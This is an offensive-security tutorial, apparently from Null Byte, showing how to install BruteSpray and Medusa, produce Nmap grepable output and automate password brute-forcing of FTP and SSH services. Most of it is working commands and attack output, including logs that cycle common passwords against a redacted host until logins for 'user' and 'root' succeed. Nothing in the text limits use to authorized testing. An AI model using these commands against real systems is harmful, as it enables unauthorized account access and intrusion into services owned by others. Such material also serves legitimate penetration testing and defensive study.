Using Hydra, Ncrack, and other brute-forcing tools to crack passwords for the first time can be frustrating and confusing. To ease into the process, let's discuss automating and optimizing brute-force attacks for potentially vulnerable services such as SMTP, SSH, IMAP, and FTP discovered by Nmap, a popular network scanning utility.
BruteSpray, developed by Jacob Robles and Shane Young, is a Python script capable of processing an Nmap scan output and automating brute-force attacks against discovered services using Medusa, a popular brute-forcing tool. BruteSpray is the much-needed nexus that unifies Nmap scans and brute-force attacks.
Step 1: Set Up BruteSpray & Medusa
An older version of BruteSpray can be found in the Kali repositories. To avoid potential confusion, any version of BruteSpray which may already be installed should be removed using the below apt-get command.
~$ apt-get autoremove brutespray
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'brutespray' is not installed, so not removed
The following packages will be REMOVED:
libgit2-27
0 upgraded, 0 newly installed, 1 to remove and 1841 not upgraded.
After this operation, 1,073 kB disk space will be freed.
Do you want to continue? [Y/n] Y
(Reading database ... 417689 files and directories currently installed.)
Removing libgit2-27:amd64 (0.27.7+dfsg.1-0.2+b1) ...
Processing triggers for libc-bin (2.29-3) ...
Next, clone the BruteSpray repository.
~$ git clone https://github.com/x90skysn3k/brutespray.git
Cloning into 'brutespray'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 506 (delta 4), reused 1 (delta 0), pack-reused 491
Receiving objects: 100% (506/506), 113.29 KiB | 2.31 MiB/s, done.
Resolving deltas: 100% (211/211), done.
Then, cd into the "brutespray" directory and use pip, a tool for installing and managing Python packages, to install the BruteSpray dependencies.
~$ cd brutespray/
The following command is required to run BruteSpray. The -r argument instructs pip to install the dependencies found in the "requirements.txt" file.
~/brutespray$ pip install -r requirements.txt
Collecting argcomplete==1.10.0
Downloading https://files.pythonhosted.org/packages/4d/82/f44c9661e479207348a979b1f6f063625d11dc4ca6256af053719bbb0124/argcomplete-1.10.0-py2.py3-none-any.whl
Installing collected packages: argcomplete
Successfully installed argcomplete-1.10.0
- Don't Miss: Python Scripting for the Aspiring Hacker
Lastly, install Medusa. This can be done using the below command.
~/brutespray$ apt-get install medusa
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
medusa
1 upgraded, 0 newly installed, 0 to remove and 1840 not upgraded.
Need to get 0 B/154 kB of archives.
After this operation, 27.6 kB disk space will be freed.
Reading changelogs... Done
(Reading database ... 417682 files and directories currently installed.)
Preparing to unpack .../medusa_2.2-6+b1_amd64.deb ...
Unpacking medusa (2.2-6+b1) over (2.2-6) ...
Setting up medusa (2.2-6+b1) ...
Processing triggers for man-db (2.8.5-2) ...
The --help argument can be used to verify BruteSpray is working properly and to view the available options.
~/brutespray$ ./brutespray.py --help
#@ @/
@@@ @@@
%@@@ @@@.
@@@@@ @@@@%
@@@@@ @@@@@
@@@@@@@ @ @@@@@@@
@(@@@@@@@% @@@@@@@ &@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@( @@@@@#@@@@@@@@@*@@@,@@@@@@@@@@@@@@@ @@@
@@@@@@ .@@@/@@@@@@@@@@@@@/@@@@ @@@@@@
@@@ @@@@@@@@@@@ @@@
@@@@* ,@@@@@@@@@( ,@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@.@@@@@@@@@@@@@@@ @@@
@@@@@@ @@@@@ @@@@@@
@@@@@@@@@@@@@
@@ @@@ @@
@@ @@@@@@@ @@
@@% @ @@
██████╗ ██████╗ ██╗ ██╗████████╗███████╗███████╗██████╗ ██████╗ █████╗ ██╗ ██╗
██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
██████╔╝██████╔╝██║ ██║ ██║ █████╗ ███████╗██████╔╝██████╔╝███████║ ╚████╔╝
██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚════██║██╔═══╝ ██╔══██╗██╔══██║ ╚██╔╝
██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗███████║██║ ██║ ██║██║ ██║ ██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
brutespray.py v1.6.6
Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Inspired by: Leon Johnson/@sho-luv
Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>
usage: brutespray.py [-h] [-f FILE] [-o OUTPUT] [-s SERVICE] [-t THREADS]
[-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME]
[-p PASSWORD] [-c] [-i] [-m]
Usage: python brutespray.py <OPTIONS>
optional arguments:
-h, --help show this help message and exit
Menu Options:
-f FILE, --file FILE GNMAP, JSON or XML file to parse
-o OUTPUT, --output OUTPUT
Directory containing successful attempts
-s SERVICE, --service SERVICE
specify service to attack
-t THREADS, --threads THREADS
number of medusa threads
-T HOSTS, --hosts HOSTS
number of hosts to test concurrently
-U USERLIST, --userlist USERLIST
reference a custom username file
-P PASSLIST, --passlist PASSLIST
reference a custom password file
-u USERNAME, --username USERNAME
specify a single username
-p PASSWORD, --password PASSWORD
specify a single password
-c, --continuous keep brute-forcing after success
-i, --interactive interactive mode
-m, --modules dump a list of available modules to brute
That's it for downloading BruteSpray and installing dependencies — there are no modifications or configurations required.
Other prerequisites which may be useful for following along with this tutorial are Nmap (of course), a general understanding of how Nmap works, and a simple wordlist for password-guessing attacks. Nmap can be installed and downloaded using the below command, if you don't already have it.
~/brutespray$ apt-get install nmap
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
liblinear3
Use 'apt autoremove' to remove it.
The following additional packages will be installed:
liblinear4 nmap-common
Suggested packages:
liblinear-tools liblinear-dev ncat
The following NEW packages will be installed:
liblinear4
The following packages will be upgraded:
nmap nmap-common
2 upgraded, 1 newly installed, 0 to remove and 1838 not upgraded.
Need to get 43.6 kB/5,995 kB of archives.
After this operation, 309 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 liblinear4 amd64 2.3.0+dfsg-3 [43.6 kB]
Fetched 43.6 kB in 1s (32.2 kB/s)
Reading changelogs... Done
Selecting previously unselected package liblinear4:amd64.
(Reading database ... 417683 files and directories currently installed.)
Preparing to unpack .../liblinear4_2.3.0+dfsg-3_amd64.deb ...
Unpacking liblinear4:amd64 (2.3.0+dfsg-3) ...
Preparing to unpack .../nmap_7.80+dfsg1-2kali1_amd64.deb ...
Unpacking nmap (7.80+dfsg1-2kali1) over (7.70+dfsg1-6kali1) ...
Preparing to unpack .../nmap-common_7.80+dfsg1-2kali1_all.deb ...
Unpacking nmap-common (7.80+dfsg1-2kali1) over (7.70+dfsg1-6kali1) ...
Setting up liblinear4:amd64 (2.3.0+dfsg-3) ...
Setting up nmap-common (7.80+dfsg1-2kali1) ...
Setting up nmap (7.80+dfsg1-2kali1) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-3) ...
The wordlist I'm using in this guide can be downloaded with the following command. You can, of course, use any wordlist that you want from leaked password databases, other wordlists online, or from custom wordlist-building tools such as Mentalist, CeWL, and Crunch.
~/brutespray$ wget 'https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt'
--2020-01-13 18:59:31-- https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: ‘1wordlist2rulethem@ll.txt’
1wordlist2rulethem@ 100%[===================>] 24.99K --.-KB/s in 0.04s
2020-01-13 18:59:31 (645 KB/s) - ‘1wordlist2rulethem@ll.txt’ saved [25585/25585]
Step 2: Generate Nmap Output Files
BruteSpray requires an Nmap output file to function. These files can be created using Nmap's -oX or -oG arguments as seen in the below Nmap command. The -sV means it will probe open ports to determine the service and version information.
Usage of -oG is the most important argument here. It will save the Nmap output to a local file in grepable format. This allows BruteSpray to effectively process the services and ports found on the target server. Similarly, the -oX argument will save the Nmap output to an XML output, which is also supported by BruteSpray but less human-readable.
~/brutespray$ nmap -sVTU -p ports TargetServer -oG filename.gnmap
Here's my example of this command and the output:
~/brutespray$ nmap -sVTU -p21,22,137,161 1X.XXX.XXX.103 -oG tokyoneon.gnmap
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 1X.XXX.XXX.103
Host is up (0.00018s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
137/tcp closed netbios-ns
161/tcp closed snmp
21/udp closed ftp
22/udp closed ssh
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
MAC Address: 6C:DB:XX:XX:XX:XX (XXXXX)
Service Info: Host: XXXXX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
Make sure to replace "ports" above with the ports you wan to scan, "TargetServer" with the IP address of your target, and "filename" with the name you want to give the file. Once done, the newly created .gnmap file can be viewed using the cat command.
~/brutespray$ cat filename.gnmap
For me, after running my example command:
~/brutespray$ cat tokyoneon.gnmap
# Nmap 7.80 scan initiated Thu Apr 12 18:34:07 2018 as: nmap -sVTU -p21,22,137,161 -oG tokyoneon.gnmap 1X.XXX.XXX.103
Host: 1X.XXX.XXX.103 () Status: Up
Host: 1X.XXX.XXX.103 () Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)/, 137/closed/tcp//netbios-ns///, 161/closed/tcp//snmp///, 21/closed/udp//ftp///, 22/closed/udp//ssh///, 137/open/udp//netbios-ns//Samba nmbd netbios-ns (workgroup: WORKGROUP)/, 161/open/udp//snmp//SNMPv1 server; net-snmp SNMPv3 server (public WORKGROUP)/
# Nmap done at Thu Apr 12 18:35:55 2018 -- 1 IP address (1 host up) scanned in 0.60 seconds
Take note of the "open" ports discovered by Nmap as these services are now available for automated brute-force attacks.
Step 3: Automate Brute-Force Attacks with BruteSpray
BruteSpray currently supports nearly two dozen services by default. The supported services can be viewed using the --modules argument. They include SSH, FTP, Telnet, VNC, MsSQL, MySQL, PostgreSQL, RSH, IMAP, NNTP, pcAnywhere, POP3, rexec, rlogin, SMBNT, SMTP, SVN, vmauthd, and SNMP.
~/brutespray$ ./brutespray.py --modules
Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Supported Services:
ssh
ftp
telnet
vnc
mssql
mysql
postgresql
rsh
imap
nntp
pcanywhere
pop3
rexec
rlogin
smbnt
smtp
svn
vmauthd
snmp
1. Interactive Mode
The -i argument can be used to enable an interactive mode, a guided mode designed to maximize the ease of use.
~/brutespray$ ./brutespray.py --file filename.gnmap -i
--------------------------------------------
./brutespray.py --file tokyoneon.gnmap -i
Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Welcome to interactive mode!
WARNING: Leaving an option blank will leave it empty and refer to default
Available services to brute-force:
Service: ftp on port 21 with 1 hosts
Service: snmp on port 161 with 1 hosts
Service: ssh on port 22 with 1 hosts
Enter services you want to brute - default all (ssh,ftp,etc):
Simply follow the prompts and the brute-force attack will begin.
Enter services you want to brute - default all (ssh,ftp,etc): ftp
Enter the number of parallel threads (default is 2): 1
Enter the number of parallel hosts to scan per service (default is 1): 1
Would you like to specify a wordlist? (y/n): n
Would to specify a single username or password (y/n): y
Enter a username: user
Enter a password:
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]
2. Target Individual Services
Targeting a single service can be accomplished using the --service argument and specifying the protocol. If the --username argument isn't specified when using --service, BruteSpray will use the default username list found in the wordlist/ssh/user file. This list of usernames can be modified at any time.
~/brutespray$ ./brutespray.py --file filename.gnmap --service ssh
--------------------------------------------
./brutespray.py --file tokyoneon.gnmap --service ssh
Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 2 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 2 complete) Password: wonderhow2 (9 of 9 complete)
CCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]
3. Configure Custom Wordlists & Usernames (Optional)
There are small built-in wordlists and username lists that are automatically used when a particular service is brute-forced. For example, the "password" file, located in the wordlist/ssh/ directory, contains passwords used when brute-forcing SSH services. Each supported service has its own dedicated directory in the wordlist/ directory.
~/brutespray$ ls -F wordlist/
ftp/ mssql/ nntp/ postgres/ rlogin/ smbnt/ ssh/ telnet/ vnc/
imap/ mysql/ pcanywhere/ rexec/ rsh/ smtp/ svn/ vmauthd/
It would be possible to manually change the built-it wordlists using the below cp command to copy over a custom wordlist.
~/brutespray$ cp /path/to/customPasswords.list wordlist/ssh/password
Built-in username lists can also be changed using the below command.
~/brutespray$ cp /path/to/customUser.list wordlist/vnc/user
Alternatively, custom password and usernames lists can be used from command line with the --passlist and --username arguments.
~/brutespray$ ./brutespray.py --file filename.gnmap --username UsernameHere --passlist /path/to/desired/passwords.list --service ftp
-----------------------------------------------------------------------------------------------------------------------
./brutespray.py --file tokyoneon.gnmap --passlist /root/to/Desktop/passwords.list --service ftp
Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]
Those are just a few examples. If you need any more help on this, hit me up in the comments below or over on Twitter @tokyoneon_.
Cover photo by Jefferson Santos/PEXELS and Screenshots by tokyoneon/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!